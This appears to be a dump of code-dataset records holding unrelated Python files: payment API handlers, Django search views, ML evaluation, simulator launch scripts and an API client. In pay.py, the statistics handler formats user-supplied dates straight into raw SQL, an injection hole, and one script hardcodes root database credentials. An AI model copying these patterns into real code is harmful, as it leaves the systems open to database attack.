gfile.makedirs(os.path.join(args.source_dir))\n print(\"Created source directory at \" + args.source_dir)\n # # Make data\n # make_concepts_targets_and_randoms(args.source_dir, args.number_of_images_per_folder, args.number_of_random_folders)\n # print(\"Successfully created data at \" + args.source_dir)\n\n # Make random\n make_randoms(args.source_dir, args.number_of_images_per_folder, args.number_of_random_folders)\n print(\"Successfully created data at \" + args.source_dir)\n\n # # Make target data\n # make_targets(args.source_dir, args.number_of_images_per_folder)\n # print(\"Successfully created data at \" + args.source_dir)\n\n #make_imagent_color_concept(args.source_dir, args.number_of_images_per_folder)\n\n # make_imagent_fix_color_concept(args.source_dir, args.number_of_images_per_folder)","sub_path":"tcav/tcav_examples/image_models/imagenet/download_and_make_datasets.py","file_name":"download_and_make_datasets.py","file_ext":"py","file_size_in_byte":8548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"175484439","text":"#coding:utf-8\n\nfrom handler.base import BaseHandler\nfrom common.settings import TWebType, TPayPolicy\nfrom common.dao import PayAccount, WebType, PayPolicy, PayRecord\nfrom utils.usual import parse_argument, FixedForm, D\nfrom utils.encoder import TPayPolicyEncoder, PayRecordStatEncoder\nfrom wtforms.fields import IntegerField, StringField, FloatField\nfrom wtforms.validators import Required\nfrom sqlalchemy import func, text\nfrom common.settings import TPayRecord\nfrom datetime import datetime, timedelta\n\n\nclass WebTypeHandler(BaseHandler):\n class PostForm(FixedForm):\n location = StringField(validators=[Required()])\n name = StringField(validators=[Required()])\n @parse_argument(PostForm)\n def post(self):\n web_type_id = WebType.create(self, **self.arguments)\n self.write_json({'web_type_id': web_type_id})\n\n class DeleteForm(FixedForm):\n web_type_id = IntegerField(validators=[Required()])\n @parse_argument(DeleteForm)\n def delete(self):\n WebType.delete(self, **self.arguments)\n self.handle_success()\n\n class PutForm(FixedForm):\n web_type_id = IntegerField(validators=[Required()])\n name = StringField(validators=[Required()])\n @parse_argument(PutForm)\n def put(self):\n TWebType.update(self, **self.arguments)\n self.handle_success()\n\n\nclass PayPolicyHandler(BaseHandler):\n class GetForm(FixedForm):\n web_type_id = IntegerField(validators=[Required()])\n @parse_argument(GetForm)\n def get(self):\n policys = self.session.query(TPayPolicy).filter_by(**self.arguments).all()\n self.write_json({'policys': policys}, encoder=TPayPolicyEncoder)\n\n class PostForm(FixedForm):\n price = FloatField(validators=[Required()])\n time = FloatField(validators=[Required()])\n ends = IntegerField(validators=[Required()])\n label = StringField(validators=[Required()])\n expired = StringField()\n web_type_id = IntegerField(validators=[Required()])\n location = StringField(validators=[Required()])\n mask = IntegerField(validators=[Required()])\n isguest = IntegerField(default=0)\n @parse_argument(PostForm)\n def post(self):\n pay_policy_id = PayPolicy.create(self, **self.arguments)\n self.write_json({'pay_policy_id': pay_policy_id})\n\n class DeleteForm(FixedForm):\n pay_policy_id = IntegerField(validators=[Required()])\n @parse_argument(DeleteForm)\n def delete(self):\n PayPolicy.delete(self, **self.arguments)\n self.handle_success()\n\n class PutForm(FixedForm):\n pay_policy_id = 
IntegerField(validators=[Required()])\n price = FloatField(validators=[Required()])\n time = FloatField(validators=[Required()])\n ends = IntegerField(validators=[Required()])\n expired = StringField(validators=[Required()])\n @parse_argument(PutForm)\n def put(self):\n PayPolicy.update(self, **self.arguments)\n self.handle_success()\n\n\nclass PayAccountHandler(BaseHandler):\n class PutForm(FixedForm):\n location = StringField(validators=[Required()])\n seller_id = StringField(validators=[Required()])\n partner = StringField(validators=[Required()])\n key = StringField(validators=[Required()])\n rsa_private_key_url = StringField(validators=[Required()])\n platform = StringField(validators=[Required()])\n @parse_argument(PutForm)\n def put(self):\n PayAccount.update(self, **self.arguments)\n self.handle_success()\n\n\nclass PayRecordHandler(BaseHandler):\n class GetForm(FixedForm):\n page = IntegerField(default=1)\n page_size = IntegerField(default=50)\n location = StringField(validators=[Required()])\n @parse_argument(GetForm)\n def get(self):\n self.arguments['_location'] = self.arguments.pop('location')\n self.arguments['status'] = 'SUCCESS'\n _paginate = PayRecord.paginate(self, **self.arguments)\n self.data.update({'paginate': _paginate})\n self.data.update({'page': self.arguments['page']})\n table = self.render_string('block_pay_record.html', **self.data)\n paginate = self.render_string('block_pay_record_paginate.html', **self.data)\n self.write_json({'table': table, 'paginate': paginate})\n\n\nclass PayRecordSearchHandler(BaseHandler):\n class GetForm(FixedForm):\n keyword = StringField(validators=[Required()])\n location = StringField(validators=[Required()])\n @parse_argument(GetForm)\n def get(self):\n _paginate = PayRecord.search(self, self.arguments['keyword'], self.arguments['location'])\n self.data.update({'paginate': _paginate})\n self.data.update({'page': 1})\n table = self.render_string('block_pay_record.html', **self.data)\n paginate = self.render_string('block_pay_record_paginate.html', **self.data)\n self.write_json({'table': table, 'paginate': paginate})\n\n\nclass PayRecordStatHandler(BaseHandler):\n class GetForm(FixedForm):\n fee = StringField(filters=[lambda x: x.split(',') if x else [], lambda x: map(D, x)])\n platform = StringField(filters=[lambda x: x.split(',')])\n start = StringField()\n end = StringField()\n location = StringField(validators=[Required()], filters=[lambda x: [x]])\n web_type_id = StringField(filters=[lambda x: x.split(',') if x else [], lambda x: map(D, x)])\n @parse_argument(GetForm)\n def get(self):\n filters = lambda x: [TPayRecord.ctime.like(x)]\n current = datetime.now()\n if current.month == 1:\n month = 12\n year = current.year - 1\n else:\n month = current.month - 1\n year = current.year\n last = datetime(year=year, month=month, day=1)\n current_like = '{}%'.format(current.strftime('%Y-%m'))\n last_like = '{}%'.format(last.strftime('%Y-%m'))\n q = self.session.query(func.sum(TPayRecord.fee)).filter_by(status='SUCCESS')\n _current = q\n _last = q\n _total = q\n if self.arguments['start'] == self.arguments['end']:\n _current = _current.filter(*filters(current_like))\n _last = _last.filter(*filters(last_like))\n start = self.arguments.pop('start', None)\n end = self.arguments.pop('end', None)\n self.arguments['_location'] = self.arguments.pop('location')\n filters = [getattr(TPayRecord, k).in_(self.arguments[k]) for k in self.arguments]\n _current = _current.filter(*filters)\n _last = _last.filter(*filters)\n _total = 
_total.filter(*filters)\n if start and end:\n start_date = datetime.strptime(start, '%Y-%m-%d')\n end_date = datetime.strptime(end, '%Y-%m-%d')\n last_start_date = start_date - (end_date - start_date)\n last_end_date = start_date - timedelta(days=1)\n _current = _current.filter(text(\"date_format(ctime, '%Y-%m-%d') between '{}' and '{}'\".format(start, end)))\n _last = _last.filter(text(\"date_format(ctime, '%Y-%m-%d') between '{}' and '{}'\".format(last_start_date,\n last_end_date)))\n C = lambda x: 0 if x is None else x\n receipt = {'current': C( _current.one()[0]), 'last': C(_last.one()[0]), 'total': C(_total.one()[0])}\n self.write_json(receipt, encoder=PayRecordStatEncoder)\n","sub_path":"core/handler/pay.py","file_name":"pay.py","file_ext":"py","file_size_in_byte":7354,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"60228462","text":"import tensorflow as tf\nimport os\nimport cv2\nimport numpy as np\nimport sys\n\nfrom model_design import model_design_nn\nimport config\nfrom data_prepare import data_loader\n\n\n\nif __name__=='__main__':\n\n images = tf.placeholder(dtype=tf.float32, shape=[None, config.img_h, config.img_w, config.img_ch])\n\n net_out = model_design_nn.cls_net(images, is_training=False)\n scores = tf.keras.layers.Softmax()(net_out)\n\n sess = tf.Session()\n saver = tf.train.Saver(max_to_keep=3)\n model_save_dir = './run_output'\n ckpt_path = tf.train.latest_checkpoint(model_save_dir)\n print('latest_checkpoint_path: ', ckpt_path)\n if ckpt_path is not None:\n saver.restore(sess, ckpt_path)\n else:\n print('ckpt not exists, task over!')\n exit(0)\n\n with sess.as_default():\n img_dir = './data/cls_crop_result_on_real'\n img_fn_list = os.listdir(img_dir)\n correct_cnt = 0\n for idx, img_fn in enumerate(img_fn_list):\n print('----------------- img_fn: %s'%img_fn)\n img_fpath = os.path.join(img_dir, img_fn)\n img_data = data_loader.preprocess(img_fpath)\n _images = np.expand_dims(img_data, axis=0)\n print('_images shape: ', images.shape)\n\n _scores = sess.run(scores, feed_dict={images: _images})\n\n print(_scores.shape)\n print(_scores)\n bg_prob, seat_belt_prob = _scores[0]\n if bg_prob > seat_belt_prob:\n cls_res = 0\n print('### BG: ', bg_prob)\n else:\n cls_res = 1\n print('### Seat_belt: ', seat_belt_prob)\n if cls_res == int(img_fn.startswith('pos_')):\n correct_cnt += 1\n else:\n # title = 'pos' if cls_res==1 else 'neg'\n # cv2.imshow('result_%s'%title, cv2.imread(img_fpath))\n # cv2.waitKey(0)\n print('######################################################### WRONG !!!')\n print('predict_result {}/{}'.format(str(correct_cnt), str(idx+1)))\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"lc_eval.py","file_name":"lc_eval.py","file_ext":"py","file_size_in_byte":2095,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"444249166","text":"import pymysql.cursors\nimport pandas as pd\nimport datetime\n\n\n# pymysql 을 이용하기 위한 접근 연결\n## mysql connection 정보 입력\nhostname = '127.0.0.1'\nport = 3306\nusername = 'root'\npassword = 'myPassWord'\ndefaultSchema = ''\n##########################\n\nconnection = pymysql.connect(host=hostname,\n port=port,\n user=username,\n password=password,\n db=defaultSchema,\n charset='utf8')\n\n############################################################\ntry:\n with connection.cursor() as cursor: #pymysql 문법. 
cursor 가 db 와의 연결점이다.\n\n res = pd.DataFrame({'A':[],'B':[], 'C':[], 'D' : [], 'E':[],'F':[],'G':[]})\n\n for i in range(19):\n # 신규 결제 학생수\n sql = '''\n \n '''\n cursor.execute(sql)\n A = cursor.fetchall()\n\n sql = '''\n \n '''\n cursor.execute(sql, )\n B = cursor.fetchall()\n\n sql = '''\n \n '''\n cursor.execute(sql)\n C = cursor.fetchall()\n\n sql = '''\n \n '''\n cursor.execute(sql)\n D = cursor.fetchall()\n\n\n row = pd.DataFrame([[A,B,C,D]],\n columns=['A', 'B', 'C','D'])\n res = pd.concat([res, row])\n res.to_csv(\"csv/test.csv\", mode=\"w\", encoding='EUC-KR')\nexcept Exception as e:\n print(e)\nfinally:\n connection.close()","sub_path":"pandasComplex.py","file_name":"pandasComplex.py","file_ext":"py","file_size_in_byte":1668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"274936859","text":"from django.http import Http404\nfrom CC.models import Product, Category\nfrom django.shortcuts import render, get_object_or_404, redirect\nfrom user.models import SearchHistory\n\n\ndef search(request):\n org_query = request.GET.get(\"leit\")\n if org_query is None:\n return redirect(\"/\")\n query = org_query.split(\" \")\n all_products = Product.objects.all()\n prod_list = list(all_products.filter(name__icontains=org_query, status=True))\n for word in query:\n result = list(all_products.filter(name__icontains=word, status=True)) + \\\n list(all_products.filter(description__icontains=word, status=True))\n for product in result:\n if product not in prod_list:\n prod_list.append(product)\n if request.user.is_authenticated:\n s = SearchHistory(user=request.user, search_query=org_query)\n s.save()\n all = Category.objects.all()\n category_sidebar = get_category_sidebar(all)\n\n return render(request,\n \"product_list/prod_list.html\",\n context={\n \"header\": \"Leit:\",\n \"prod_list\": prod_list,\n \"search\": True,\n \"query\": \"'{}'\".format(org_query),\n \"categories\": category_sidebar,\n \"sidebars\": True,\n \"filter\": \"Flokkar\"\n })\n\n\ndef _get_parent(category, url_string=\"\"):\n if category is None:\n return url_string\n return _get_parent(category.parent, url_string) + \"/\" + category.URL_keyword\n\n\ndef _does_cat_exist(category):\n try:\n get_object_or_404(Category, URL_keyword=category)\n return True\n except Http404:\n return False\n\n\ndef _is_complete_url(cat, url):\n # gets a category and a list of urls\n # and recursively checks if they are the same\n # cat acts like a singly linked list, a category only knows its parent (node knows next)\n if not url and cat is None:\n return True\n if not url:\n return False\n if cat is None:\n return False\n if cat.URL_keyword == url[-1]:\n return _is_complete_url(cat.parent, url[:-1])\n return False\n\n\n#_get_sub_categories is a cool function\n# because categories sort of act like a singly linked list( a category only knows its parent)\n# I have to recursively create a list of dictionaries, which has category as key and lists of dictionaries as values\n# [{category_obj: [{sub_category_obj: [{sub_sub_category_obj: []}]}]}]\n# It's a neat way of creating the filter sidebar by using the categories as filters\ndef _get_sub_categories(category, all):\n cat_list = list(all.filter(parent=category))\n if not cat_list:\n return []\n temp_list = []\n for sub in cat_list:\n if sub.status:\n temp_list.append({sub: _get_sub_categories(sub, all)})\n return temp_list\n\n\ndef get_category_sidebar(all): # used in search, serves categories as a sidebar\n # with each category that has 
children having a \"+\" which activates a dropdown\n cat1 = all.get(URL_keyword=\"leikjatolvur\")\n cat2 = all.get(URL_keyword=\"leikir\")\n cat3 = all.get(URL_keyword=\"aukahlutir\")\n return {\n cat1: _get_sub_categories(cat1, all),\n cat2: _get_sub_categories(cat2, all),\n cat3: _get_sub_categories(cat3, all)\n }\n\n\ndef category(request, hierarchy): # the \"hierarchy\" parameter needs to be there even though it is not used.\n categories = request.path_info.split(\"/\")[2:]\n if categories[-1] == \"\":\n categories = categories[:-1]\n\n last_url = categories[-1]\n all = Category.objects.all()\n try:\n cat = all.get(URL_keyword=last_url)\n except:\n raise Http404\n\n if not cat.status: # if the category is disabled\n raise Http404\n\n if _is_complete_url(cat, categories):\n elder = get_object_or_404(Category, URL_keyword=categories[0])\n elder_subs = {}\n for sub_cat in _get_sub_categories(elder, all):\n for sub_cat_name, children in sub_cat.items():\n elder_subs[sub_cat_name] = children\n\n header = cat.name\n order_no = request.GET.get(\"rodun\")\n if order_no:\n order = \"\"\n # this is for getting the order by correct\n # \"name\" orders by name ascending, \"-name\" orders by name descending\n if order_no == \"1\":\n order = \"name\"\n elif order_no == \"2\":\n order = \"-name\"\n elif order_no == \"3\":\n order = \"-total\"\n elif order_no == \"4\":\n order = \"total\"\n the_list = list(Product.objects.filter(category=cat, status=True).order_by(order))\n else:\n the_list = list(Product.objects.filter(category=cat, status=True).order_by(\"total\"))\n return render(request,\n \"product_list/prod_list.html\",\n context={\n \"header\": header,\n \"prod_list\": the_list,\n \"categories\": elder_subs,\n \"parent\": \"\",\n \"sidebars\": True,\n \"filter\": \"Filter\"\n })\n else:\n if _does_cat_exist(last_url):\n new_url_string = \"/flokkur\" + _get_parent(cat)\n return redirect(new_url_string)\n","sub_path":"app/product_list/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"202416476","text":"import argparse\r\nimport importlib\r\n\r\nparser = argparse.ArgumentParser(description='Project Euler solutions written in Python 3.')\r\nparser.add_argument('solution', metavar='S', type=str, help='The solution to run')\r\nargs = parser.parse_args()\r\n\r\n# Add leading zeroes to solution argument if necessary\r\nsolution_input = args.solution\r\nwhile len(solution_input) < 3:\r\n solution_input = '0' + solution_input\r\n\r\n# Import the solution script\r\nsolution = None\r\n# noinspection PyBroadException\r\ntry:\r\n solution = importlib.import_module(f'solutions.{solution_input}')\r\nexcept ModuleNotFoundError:\r\n print(f'Couldn\\'t find module: solutions.{solution_input}')\r\n exit(1)\r\n\r\n# Run the solution and print the answer it returns\r\nanswer = solution.solution()\r\nprint(answer)\r\n","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":773,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"95030718","text":"#!/usr/bin/env python3\n\n# This is a job launch script for GAPBS tests with gem5-20\n\nimport os\nimport sys\nfrom uuid import UUID\nfrom itertools import starmap\nfrom itertools import product\n\nfrom gem5art.artifact.artifact import Artifact\nfrom gem5art.run import gem5Run\nfrom gem5art.tasks.tasks import run_gem5_instance\n\npacker = Artifact.registerArtifact(\n command = 
'''wget https://releases.hashicorp.com/packer/1.4.3/packer_1.4.3_linux_amd64.zip;\n unzip packer_1.4.3_linux_amd64.zip;\n ''',\n typ = 'binary',\n name = 'packer',\n path = 'disk-image/packer',\n cwd = 'disk-image',\n documentation = 'Program to build disk images. Downloaded sometime in August from hashicorp.'\n)\n\nexperiments_repo = Artifact.registerArtifact(\n command = 'git clone https://github.com/darchr/gem5art-experiments.git',\n typ = 'git repo',\n name = 'gapbs-test',\n path = './',\n cwd = '../',\n documentation = 'main experiments repo to run GAPBS with gem5'\n)\n\ngem5_repo = Artifact.registerArtifact(\n command = 'git clone https://gem5.googlesource.com/public/gem5',\n typ = 'git repo',\n name = 'gem5',\n path = 'gem5/',\n cwd = './',\n documentation = 'cloned gem5 from googlesource and checked out release-staging-v20.0.0.0 (May 6th, 2020)'\n)\n\nm5_binary = Artifact.registerArtifact(\n command = 'scons build/x86/out/m5',\n typ = 'binary',\n name = 'm5',\n path = 'gem5/util/m5/build/x86/out/m5',\n cwd = 'gem5/util/m5',\n inputs = [gem5_repo,],\n documentation = 'm5 utility for gem5-20'\n)\n\ndisk_image = Artifact.registerArtifact(\n command = './packer build gapbs.json',\n typ = 'disk image',\n name = 'gapbs',\n cwd = 'disk-image',\n path = 'disk-image/gapbs-image/gapbs',\n inputs = [packer, experiments_repo, m5_binary,],\n documentation = 'Ubuntu with m5 binary installed and root auto login'\n)\n\ngem5_binary = Artifact.registerArtifact(\n command = '''cd gem5;\n git checkout 003c08418f841e6697b1b;\n scons build/X86/gem5.opt -j20\n ''',\n typ = 'gem5 binary',\n name = 'gem5',\n cwd = 'gem5/',\n path = 'gem5/build/X86/gem5.opt',\n inputs = [gem5_repo,],\n documentation = 'gem5 binary based on googlesource/release-staging-v20.0.0.0'\n)\n\ngem5_binary_MESI_Two_Level = Artifact.registerArtifact(\n command = '''cd gem5;\n git checkout d40f0bc579fb8b10da7181;\n scons build/X86_MESI_Two_Level/gem5.opt --default=X86 PROTOCOL=MESI_Two_Level SLICC_HTML=True -j8\n ''',\n typ = 'gem5 binary',\n name = 'gem5',\n cwd = 'gem5/',\n path = 'gem5/build/X86_MESI_Two_Level/gem5.opt',\n inputs = [gem5_repo,],\n documentation = 'gem5 binary based on googlesource (Feb. 
20, 2020)'\n)\n\nlinux_repo = Artifact.registerArtifact(\n command = '''git clone https://github.com/torvalds/linux.git;\n mv linux linux-stable''',\n typ = 'git repo',\n name = 'linux-stable',\n path = 'linux-stable/',\n cwd = './',\n documentation = 'linux kernel 5.3.2 source code repo obtained in November 2019'\n)\n\n\nlinux_binaries = Artifact.registerArtifact(\n name = 'vmlinux-5.2.3',\n typ = 'kernel',\n path = 'linux-stable/vmlinux-5.2.3',\n cwd = 'linux-stable/',\n command = '''git checkout v5.2.3;\n cp ../linux-configs/config.5.2.3 .config;\n make -j20;\n cp vmlinux vmlinux-5.2.3;\n ''',\n inputs = [experiments_repo, linux_repo,],\n documentation = \"Kernel binary for 5.2.3 with simple \"\n \"config file\",\n )\n\nif __name__ == \"__main__\":\n\n num_cpus = ['1', '2', '4']\n workloads = ['bc', 'bfs', 'cc', 'sssp', 'tc','pr']\n sizes = ['3', '15', '20']\n cpu_types = ['kvm', 'atomic', 'simple', 'o3']\n graphs = ['roadU.sg', 'webU.sg']\n mem_types = ['classic', 'MI_example','MESI_Two_Level']\n\n def createRun_synthetic(cpu, num_cpu, mem, workload,size):\n\n if mem == 'MESI_Two_Level':\n binary_gem5 = 'gem5/build/X86_MESI_Two_Level/gem5.opt'\n artifact_gem5 = gem5_binary_MESI_Two_Level\n else:\n binary_gem5 = 'gem5/build/X86/gem5.opt'\n artifact_gem5 = gem5_binary\n\n return gem5Run.createFSRun(\n 'Running GAPBS with gem5-20',\n binary_gem5,\n 'configs-gapbs-tests/gapbs_config.py',\n 'results/run_exit/vmlinux-5.2.3/gapbs/{}/{}/{}/{}/synthetic/{}'.\n format(cpu, num_cpu, mem ,workload, size),\n artifact_gem5, gem5_repo, experiments_repo,\n 'linux-stable/vmlinux-5.2.3',\n 'disk-image/gapbs-image/gapbs',\n linux_binaries, disk_image, cpu, num_cpu, mem ,workload, '1', size,\n timeout = 6*60*60\n )\n\n def createRun_realGraph(cpu, num_cpu, mem, workload,graph):\n\n if mem == 'MESI_Two_Level':\n binary_gem5 = 'gem5/build/X86_MESI_Two_Level/gem5.opt'\n artifact_gem5 = gem5_binary_MESI_Two_Level\n else:\n binary_gem5 = 'gem5/build/X86/gem5.opt'\n artifact_gem5 = gem5_binary\n\n return gem5Run.createFSRun(\n 'Running GAPBS with gem5-20',\n binary_gem5,\n 'configs-gapbs-tests/gapbs_config.py',\n 'results/run_exit/vmlinux-5.2.3/gapbs/{}/{}/{}/{}/real_graph/{}'.\n format(cpu, num_cpu, mem ,workload, size),\n artifact_gem5, gem5_repo, experiments_repo,\n 'linux-stable/vmlinux-5.2.3',\n 'disk-image/gapbs-image/gapbs',\n linux_binaries, disk_image, cpu, num_cpu, mem ,workload, '0', graph,\n timeout = 6*60*60\n )\n\n # For the cross product of tests, create a run object.\n runs = starmap(createRun_synthetic, product(cpu_types, num_cpus, mem_types,workloads,sizes))\n # Run all of these experiments in parallel\n for run in runs:\n run_gem5_instance(run, os.getcwd(),)\n\n runs = starmap(createRun_realGraph, product(cpu_types, num_cpus, mem_types,workloads,graphs))\n # Run all of these experiments in parallel\n for run in runs:\n run_gem5_instance(run, os.getcwd(),)\n\n","sub_path":"launch-scripts/launch_gapbs_gem5_20.py","file_name":"launch_gapbs_gem5_20.py","file_ext":"py","file_size_in_byte":6127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"99845288","text":"import os, shutil, glob, re\nfrom datetime import datetime\nimport threading\n\ntry:\n import cPickle as pickle\nexcept ImportError:\n import pickle\n\nfrom app.utilities import str_utils\nfrom app.data.database import DB\n\nimport app.engine.config as cf\nfrom app.engine.objects.item import ItemObject\nfrom app.engine.objects.skill import SkillObject\n\nimport logging\nlogger = 
logging.getLogger(__name__)\n\nSAVE_THREAD = None\nGAME_NID = str(DB.constants.value('game_nid'))\nSUSPEND_LOC = 'saves/' + GAME_NID + '-suspend.pmeta'\n\nclass SaveSlot():\n no_name = '--NO DATA--'\n\n def __init__(self, metadata_fn, idx):\n self.name = self.no_name\n self.playtime = 0\n self.realtime = 0\n self.kind = None # Prep, Base, Suspend, Battle, Start\n self.mode = None\n self.idx = idx\n\n self.meta_loc = metadata_fn\n self.save_loc = metadata_fn[:-4]\n\n self.read()\n\n def read(self):\n if os.path.exists(self.meta_loc):\n with open(self.meta_loc, 'rb') as fp:\n save_metadata = pickle.load(fp)\n self.name = save_metadata['level_title']\n self.playtime = save_metadata['playtime']\n self.realtime = save_metadata['realtime']\n self.kind = save_metadata['kind']\n self.mode = save_metadata.get('mode')\n\n def get_name(self):\n if self.kind == 'turn_change':\n turn = int(re.findall(r'\\d+', self.meta_loc)[-1])\n return self.name + (' - Turn %d' % turn)\n elif self.kind:\n return self.name + ' - ' + self.kind\n else:\n return self.name\n\n def __repr__(self):\n return '%d: %s' % (self.idx, self.get_name())\n\ndef dict_print(d):\n for k, v in d.items():\n if isinstance(v, dict):\n dict_print(v)\n else:\n print(\"{0} : {1}\".format(k, v))\n\ndef save_io(s_dict, meta_dict, old_slot, slot, force_loc=None, name=None):\n if name:\n save_loc = 'saves/' + name + '.p'\n elif force_loc:\n save_loc = 'saves/' + GAME_NID + '-' + force_loc + '.p'\n elif slot is not None:\n save_loc = 'saves/' + GAME_NID + '-' + str(slot) + '.p'\n meta_loc = save_loc + 'meta'\n\n logger.info(\"Saving to %s\", save_loc)\n\n with open(save_loc, 'wb') as fp:\n # pickle.dump(s_dict, fp, -1)\n try:\n pickle.dump(s_dict, fp)\n except TypeError as e:\n # There's a surface somewhere in the dictionary of things to save...\n dict_print(s_dict)\n print(e)\n with open(meta_loc, 'wb') as fp:\n pickle.dump(meta_dict, fp)\n\n # For restart\n if not force_loc:\n r_save = 'saves/' + GAME_NID + '-restart' + str(slot) + '.p'\n r_save_meta = r_save + 'meta'\n # If the slot I'm overwriting is a start of map\n # Then rename it to restart file\n if meta_dict['kind'] == 'start':\n if save_loc != r_save:\n shutil.copy(save_loc, r_save)\n shutil.copy(meta_loc, r_save_meta)\n elif old_slot is not None:\n old_name = 'saves/' + GAME_NID + '-restart' + str(old_slot) + '.p'\n old_name_meta = old_name + 'meta'\n if old_name != r_save:\n shutil.copy(old_name, r_save)\n shutil.copy(old_name_meta, r_save_meta)\n\n # For preload\n if meta_dict['kind'] == 'start':\n preload_saves = glob.glob('saves/' + GAME_NID + '-preload-' + str(meta_dict['level_nid']) + '-*.p')\n nids = [p.split('-')[-1][:-2] for p in preload_saves]\n unique_nid = str(str_utils.get_next_int('0', nids))\n preload_save = 'saves/' + GAME_NID + '-preload-' + str(meta_dict['level_nid']) + '-' + unique_nid + '.p'\n preload_save_meta = 'saves/' + GAME_NID + '-preload-' + str(meta_dict['level_nid']) + '-' + unique_nid + '.pmeta'\n\n shutil.copy(save_loc, preload_save)\n shutil.copy(meta_loc, preload_save_meta)\n\ndef suspend_game(game_state, kind, slot=None, name=None):\n \"\"\"\n Saves game state to file\n \"\"\"\n logging.debug(\"Suspending game...\")\n s_dict, meta_dict = game_state.save()\n logging.debug(\"Suspend state: %s\", game_state.state.state_names())\n logging.debug(\"Suspend temp state: %s\", game_state.state.temp_state)\n meta_dict['kind'] = kind\n meta_dict['time'] = datetime.now()\n if game_state.current_save_slot:\n current_save_slot = game_state.current_save_slot.idx\n 
else:\n current_save_slot = None\n\n if kind == 'suspend':\n force_loc = 'suspend'\n else:\n force_loc = None\n\n global SAVE_THREAD\n SAVE_THREAD = threading.Thread(target=save_io, args=(s_dict, meta_dict, current_save_slot, slot, force_loc, name))\n SAVE_THREAD.start()\n\ndef load_game(game_state, save_slot):\n \"\"\"\n Load game state from file\n \"\"\"\n save_loc = save_slot.save_loc\n logging.info(\"Loading from %s\", save_loc)\n with open(save_loc, 'rb') as fp:\n s_dict = pickle.load(fp)\n game_state.build_new()\n game_state.load(s_dict)\n game_state.current_save_slot = save_slot\n\n set_next_uids(game_state)\n\ndef set_next_uids(game_state):\n if game_state.item_registry:\n ItemObject.next_uid = max(game_state.item_registry.keys()) + 1\n else:\n ItemObject.next_uid = 100\n if game_state.skill_registry:\n SkillObject.next_uid = max(game_state.skill_registry.keys()) + 1\n else:\n SkillObject.next_uid = 100\n logging.info(\"Setting next item uid: %d\" % ItemObject.next_uid)\n logging.info(\"Setting next skill uid: %d\" % SkillObject.next_uid)\n\ndef load_saves():\n save_slots = []\n for num in range(0, int(DB.constants.value('num_save_slots'))):\n meta_fp = 'saves/' + GAME_NID + '-' + str(num) + '.pmeta'\n ss = SaveSlot(meta_fp, num)\n save_slots.append(ss)\n return save_slots\n\ndef load_restarts():\n save_slots = []\n for num in range(0, int(DB.constants.value('num_save_slots'))):\n meta_fp = 'saves/' + GAME_NID + '-restart' + str(num) + '.pmeta'\n ss = SaveSlot(meta_fp, num)\n save_slots.append(ss)\n return save_slots\n\ndef get_all_saves():\n \"\"\"\n Grabs all the turn_change saves\n \"\"\"\n save_slots = []\n name = 'saves/' + GAME_NID + '-turn_change-*-*.pmeta'\n for meta_fn in glob.glob(name):\n ss = SaveSlot(meta_fn, 0)\n save_slots.append(ss)\n save_slots = sorted(save_slots, key=lambda x: x.realtime, reverse=True)\n return save_slots\n\ndef remove_suspend():\n if not cf.SETTINGS['debug'] and os.path.exists(SUSPEND_LOC):\n os.remove(SUSPEND_LOC)\n\ndef get_save_title(save_slots):\n options = [save_slot.get_name() for save_slot in save_slots]\n colors = [DB.difficulty_modes.get(save_slot.mode).color if save_slot.mode else 'green' for save_slot in save_slots]\n return options, colors\n\ndef check_save_slots():\n global SAVE_SLOTS, RESTART_SLOTS\n SAVE_SLOTS = load_saves()\n RESTART_SLOTS = load_restarts()\n\nSAVE_SLOTS = load_saves()\nRESTART_SLOTS = load_restarts()\n","sub_path":"app/engine/save.py","file_name":"save.py","file_ext":"py","file_size_in_byte":6999,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"551856691","text":"# Licensed under a 3-clause BSD style license - see LICENSE.rst\nfrom __future__ import division\n\nimport os\nimport tempfile\nimport json\nimport tables\nimport shutil\nimport logging\nfrom glob import glob\nimport numpy as np\n\nimport Ska.DBI\n\nimport mica.archive.asp_l1 as asp_l1_arch\nimport mica.archive.obspar as obspar_arch\nfrom mica.archive import obsid_archive\nfrom .core import Obi, VV_VERSION\nfrom .vv import FILES\n\n\nVV_DTYPE = np.dtype(\n [('obsid', ' FireflyResponse:\n \"\"\"\n Gets the wisdoms list for the user with the demo wisdoms can filter with search_term.\n\n Args:\n api_key (Optional[str]): Explicit `api_key`, not required, if `Whatify.login()` was run prior.\n search_term (Optional[str]): the search term you want to filter\n :return:\n FireflyResponse: Contains mapping of wisdoms for the user.\n \"\"\"\n requestor = APIRequestor()\n # filter_ = None\n # sort = None\n # 
page = None\n # page_size = None\n\n # url = '{prefix}/with_demo'.format(prefix=cls._CLASS_PREFIX)\n # # url = '{prefix}'.format(prefix=cls._CLASS_PREFIX)\n # # filters = requestor.parse_filter_parameters(filter_)\n # filters = requestor.parse_filter_parameters(filter_={'name': [search_term]})\n # sorts = requestor.parse_sort_parameters(sort)\n # params = {'search_all_columns': search_term,\n # 'page': page, 'page_size': page_size,\n # 'sort': sorts, 'filter': filters\n # }\n #\n # response = requestor.get(url=url if url else cls.class_url(), params=params, api_key=api_key)\n\n url = '{prefix}/with_demo'.format(prefix=cls._CLASS_PREFIX)\n response = requestor.get(url, api_key=api_key)['hits']\n if search_term:\n response = [d for d in response if str(d['name']).find(search_term) != -1]\n return response\n\n @classmethod\n def get_suggest_wisdom_list(cls, search_term: str = None, api_key: str = None) -> FireflyResponse:\n \"\"\"\n Gets the suggested wisdoms list for the user; can be filtered with search_term.\n\n Args:\n api_key (Optional[str]): Explicit `api_key`, not required, if `Whatify.login()` was run prior.\n search_term (Optional[str]): the 